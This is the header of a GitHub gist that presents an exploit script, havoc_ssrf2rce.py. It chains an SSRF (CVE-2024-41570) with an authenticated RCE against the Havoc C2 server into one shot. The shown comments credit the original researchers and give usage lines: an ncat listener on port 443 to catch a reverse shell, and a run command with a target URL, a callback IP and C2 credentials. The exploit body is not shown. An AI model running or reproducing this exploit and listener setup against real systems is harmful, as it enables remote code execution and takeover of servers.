averageguy011
averageguy011
/ havoc_ssrf2rce.py
Created
January 19, 2025 15:22
— forked from pich4ya/havoc_ssrf2rce.py
The modified exploit code of SSRF (CVE-2024-41570) from @_chebuya and authN RCE from Laurence Tennant, Include Security
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| # Havoc C2 SSRF to AuthN RCE | |
| # @author longcat (https://sth.sh) | |
| # | |
| # sudo ncat -lvp 443 | |
| # python havoc_ssrf2rce.py -t https://havoc.c2/ -l 1.3.3.7 --c2user 5pider --c2pass RKnnj5Vfq3bt9y7L | |
| # | |
| # The original authors are @_chebuya (SSRF) and Laurence Tennant, Include Security (AuthN RCE) | |
| # Their writeups are great. I am so fascinating to read @_chebuya blog post :) | |
| # My work is just to integrate them into one single shot exploit. | |
| # In short, make WebSocket works with Havoc C2 Agent Payload |